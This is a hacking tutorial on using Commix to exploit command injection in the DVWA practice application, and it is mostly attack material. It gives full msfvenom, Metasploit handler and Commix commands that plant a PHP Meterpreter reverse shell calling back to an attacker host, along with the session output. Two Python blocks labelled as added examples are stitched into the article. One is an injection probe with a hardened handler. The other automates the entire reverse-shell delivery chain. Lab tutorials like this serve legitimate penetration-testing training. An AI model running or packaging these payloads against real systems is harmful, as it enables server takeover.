
How to Use Commix to Automate Exploitation of Command Injection Flaws in Web Applications « Null Byte :: WonderHowTo

The ability to execute system commands through a vulnerable web application makes command injection a lucrative attack vector for any hacker. But although this kind of vulnerability is highly prized, it can take a long time to scan an entire application for these flaws by hand. Fortunately, there is a useful tool called Commix that can automate this process for us.

What is Commix?

Commix, short for command injection exploiter, is an open source tool used to test web applications for command injection vulnerabilities. It is automated, so it can identify vulnerable parameters in a fraction of the time that manual testing would take.

Commix is written in Python, which means it runs on Linux, macOS and Windows. It is also conveniently included in the official repositories of Kali Linux, BlackArch and Parrot Security OS. Everything works out of the box, and there is even support for developing custom modules to extend the tool's core functionality.

There are many options available, including the ability to specify the parameters used to connect to the host, enumerate the target, read and write files, and even an offline mode. All of these features make Commix a very useful asset when trying to exploit command injection.

In this tutorial, we use Commix, and later msfvenom and Metasploit, to exploit command injection flaws in DVWA (Damn Vulnerable Web Application).

Method 1: Basic Operation

To get started, open DVWA and log in with the default credentials.

Next, navigate to the "DVWA Security" tab and set the security level to "low." This ensures that everything works smoothly while we learn the tool.

Now go to the "Command Execution" tab, which is the page we will point Commix at.

Commix needs the cookie containing the session ID and the security level in order to run successfully. Use your browser's "Inspect Element" tool to view the request: open the "Network" tab and then "Raw headers" to see the cookie value.
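The article's output for this basic run is not reproduced on this page, but the check Commix performs is simple enough to show in a few lines. The following Python is an added example, not code from the article or from Commix itself. It builds the same kind of results-based probe that Commix reports later in the article (the payload of the form ;echo MARKER$((42+12))$(echo MARKER)MARKER), applies it to a constructed stand-in for DVWA's low-security ping handler, which concatenates the ip value into a shell command line, and to a hardened handler that validates the value as an IP address and never involves a shell. The handler code, the function names and the use of ping -c 1 are this example's own assumptions; the numbers and marker layout mirror the Commix payload quoted below.

```python
# Added example (not part of the Null Byte article or of Commix): a minimal
# version of the results-based command injection check Commix runs against
# DVWA's ping form, plus the vulnerable handler it detects and a hardened
# handler it does not. Function names and the handlers are assumptions.
import ipaddress
import secrets
import string
import subprocess


def random_marker(length=6):
    """Random upper-case token, so a response cannot contain it by chance."""
    return "".join(secrets.choice(string.ascii_uppercase) for _ in range(length))


def build_probe(marker, separator=";"):
    """Payload appended to an otherwise valid value such as 127.0.0.1.

    If the value reaches a shell, echo prints MARKER, the result of the
    arithmetic 42+12, a command-substituted MARKER, then MARKER again.
    A server that merely reflects the input back cannot produce the 54.
    """
    return f"{separator}echo {marker}$((42+12))$(echo {marker}){marker}"


def evidence(marker):
    """What the response must contain for the injection to have executed."""
    return f"{marker}54{marker}{marker}"


def is_injectable(response_text, marker):
    return evidence(marker) in response_text


def vulnerable_ping(ip):
    """Stand-in for DVWA 'low' (constructed here, not DVWA's own code):
    the user value is concatenated into a shell command string."""
    try:
        proc = subprocess.run("ping -c 1 " + ip, shell=True,
                              capture_output=True, text=True, timeout=15)
    except subprocess.TimeoutExpired:
        return ""
    return proc.stdout + proc.stderr


def hardened_ping(ip):
    """Validate the value as an IP address and pass it as one argv element;
    no shell parses it, so ';', '$(...)' and '$((...))' are inert."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return "invalid IP address"
    try:
        proc = subprocess.run(["ping", "-c", "1", str(addr)],
                              capture_output=True, text=True, timeout=15)
    except (OSError, subprocess.TimeoutExpired):
        return "ping unavailable"
    return proc.stdout + proc.stderr


def probe(handler, separator=";"):
    """Run one results-based test against a handler; True means injectable."""
    marker = random_marker()
    response = handler("127.0.0.1" + build_probe(marker, separator))
    return is_injectable(response, marker)


if __name__ == "__main__":
    print("vulnerable handler injectable:", probe(vulnerable_ping))
    print("hardened handler injectable:  ", probe(hardened_ping))
```

The marker-plus-arithmetic trick is what makes the check reliable: an application that simply echoes the submitted string back would still contain the marker, but only a real shell evaluates $((42+12)) to 54, so a false positive from reflection is ruled out. The hardened handler fails the probe for two independent reasons, input validation and argv-style execution; either alone would block this payload, and keeping both is the usual defence in depth.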

Method 2: Upload a Reverse Shell

Commix has a feature that lets us write files to the target system. We will drop a reverse shell that calls back to our attacking machine, but before we do, we need to generate the payload.

Msfvenom is the payload generator that replaced both msfpayload and msfencode back in 2015. This single tool can generate payloads for use outside the Metasploit Framework.

Run msfvenom with the following options:

  • -p to specify the payload.
  • lhost and lport to set the listener's address and port.
  • -e to specify the encoder.
  • -f to specify the output format.

Use > to redirect the output into the file payload.php.

  root@drd:~# msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.1.100 lport=4321 -e php/base64 -f raw > payload.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 1507 (iteration=0)
php/base64 chosen with final size 1507
Payload size: 1507 bytes 

The payload has been created. Now we just need to add the PHP tags to the file, since the raw output contains only the encoded eval() call and the web server will not execute it without them. Open the file with nano payload.php, add <?php at the very beginning and ?> at the very end, then press Ctrl-X, Y and Enter to save.

Now we need to start a handler on our machine to catch the session that will open from the target. In a new terminal window, launch Metasploit with the command msfconsole. Then type use exploit/multi/handler to load the generic handler.

Then set the payload, listening address and port to match what we put into the file earlier.

  msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 172.16.1.100
lhost => 172.16.1.100
msf exploit(multi/handler) > set lport 4321
lport => 4321 

Once those are set, start the handler by typing run, an alias for exploit.

  msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.1.100:4321

Back in our other terminal, we run Commix just as before, with a few extra options to get our payload onto the target.

  • --file-write to specify the file on our local machine that we want to upload.
  • --file-dest to set the destination path on the target.
  • --os-cmd to specify the command to run once the file has been written.

The destination directory must be writable by the web server's user (www-data here) and the php binary must be available on the target for the last step to work.

  commix -u http://172.16.1.102/dvwa/vulnerabilities/exec/ --cookie='PHPSESSID=ba245268c2d2c08a209bf7db8bd004a0; security=low' --data='ip=127.0.0.1&submit=submit' --file-write='/root/payload.php' --file-dest='/var/www/payload.php' --os-cmd='php -f /var/www/payload.php'

If everything works, this executes our payload and the handler catches the session. Commix runs for a moment, and eventually we see that the file was successfully created on the target.

  ...

[*] Testing the (results-based) classic command injection technique... [ SUCCEED ]
[+] The POST parameter 'ip' seems injectable via (results-based) classic command injection technique.
[~] Payload: ;echo YJOSPV$((42+12))$(echo YJOSPV)YJOSPV
[+] The file '/var/www/payload.php' was successfully created! 

Back in the handler's terminal, we can see that a Meterpreter session has indeed been opened. We can now run commands such as getuid and sysinfo to display information about the target.

  [*] Sending stage (37775 bytes) to 172.16.1.102
[*] Meterpreter session 1 opened (172.16.1.100:4321 -> 172.16.1.102:40115) at 2018-10-18 11:29:19 -0500

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : metasploitable
OS          : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Meterpreter : php/linux 

These are results similar to what we got earlier using Commix on its own, but now that we have a Meterpreter session there is much more flexibility in what we can do next.
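To make Method 2 repeatable, the whole chain can be scripted. The following Python is an added example, not code from the article, Commix or Metasploit: it generates the payload with msfvenom, wraps it in PHP tags the way the nano step above does, writes a Metasploit resource file so the handler can be started with a single command instead of typing each set line, and finally invokes Commix with the same file options. The hosts, port, paths, cookie value and flags are the ones used above; the resource-file approach, the prepare/deliver split and the helper names are this example's own assumptions.

```python
# Added example (not from the Null Byte article): the Method 2 chain as one
# script. Values are those the article uses; helper names are assumptions.
import pathlib
import shutil
import subprocess
import sys

LHOST = "172.16.1.100"
LPORT = 4321
TARGET = "http://172.16.1.102/dvwa/vulnerabilities/exec/"
COOKIE = "PHPSESSID=ba245268c2d2c08a209bf7db8bd004a0; security=low"
LOCAL_PAYLOAD = pathlib.Path("/root/payload.php")
REMOTE_PAYLOAD = "/var/www/payload.php"
HANDLER_RC = pathlib.Path("/tmp/handler.rc")


def wrap_php_tags(raw):
    """msfvenom -f raw with php/base64 emits only eval(base64_decode(...));
    the web server executes it only inside <?php ... ?>. Idempotent, so a
    file that already carries the opening tag is passed through unchanged."""
    body = raw.strip()
    if body.startswith("<?php"):
        return body + "\n"
    return f"<?php\n{body}\n?>\n"


def msfvenom_cmd():
    """Same msfvenom invocation as the article, as an argv list."""
    return ["msfvenom", "-p", "php/meterpreter/reverse_tcp",
            f"LHOST={LHOST}", f"LPORT={LPORT}", "-e", "php/base64", "-f", "raw"]


def handler_rc():
    """Resource file replacing the interactive set commands; start it with
    msfconsole -q -r /tmp/handler.rc. 'run -j -z' backgrounds the handler
    without attaching to the first session, so several callbacks can land."""
    return "\n".join([
        "use exploit/multi/handler",
        "set payload php/meterpreter/reverse_tcp",
        f"set LHOST {LHOST}",
        f"set LPORT {LPORT}",
        "run -j -z",
    ]) + "\n"


def commix_cmd():
    """The article's Commix command. Passing argv directly avoids any shell
    quoting of the cookie, which contains a space and a semicolon."""
    return ["commix", "-u", TARGET, f"--cookie={COOKIE}",
            "--data=ip=127.0.0.1&submit=submit",
            f"--file-write={LOCAL_PAYLOAD}", f"--file-dest={REMOTE_PAYLOAD}",
            f"--os-cmd=php -f {REMOTE_PAYLOAD}"]


def prepare():
    """Generate the payload file and the handler resource file."""
    for tool in ("msfvenom", "msfconsole", "commix"):
        if shutil.which(tool) is None:
            sys.exit(f"missing tool: {tool}")
    raw = subprocess.run(msfvenom_cmd(), check=True,
                         capture_output=True, text=True).stdout
    LOCAL_PAYLOAD.write_text(wrap_php_tags(raw))
    HANDLER_RC.write_text(handler_rc())
    print(f"payload written to {LOCAL_PAYLOAD}; start the handler in another "
          f"terminal with: msfconsole -q -r {HANDLER_RC}")


def deliver():
    """Upload and execute the payload once the handler is listening."""
    subprocess.run(commix_cmd(), check=True)


if __name__ == "__main__":
    actions = {"prepare": prepare, "deliver": deliver}
    action = actions.get(sys.argv[1]) if len(sys.argv) > 1 else None
    if action is None:
        sys.exit("usage: python3 script.py prepare | deliver")
    action()
```

Run it with the prepare argument first, start the handler from the resource file in a second terminal, then run it with deliver. Splitting the two steps keeps the ordering explicit: if Commix fires the php -f command before the handler is listening, the connection is refused and the session is lost, which is the most common reason this chain appears to fail.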

Conclusion

Command injection vulnerabilities are sought after by hackers because of the power they grant over the target system. Commix is an extremely useful tool designed to automate finding and exploiting these vulnerabilities, making life a little easier for the hacker.

In this guide, we covered some basic usage options. We also saw how to combine msfvenom with Commix to upload a payload to the target and get a shell. This flexibility makes Commix an excellent addition to any hacker's arsenal.


Cover image by jarmoluk/Pixabay; screenshots by drd_/Null Byte
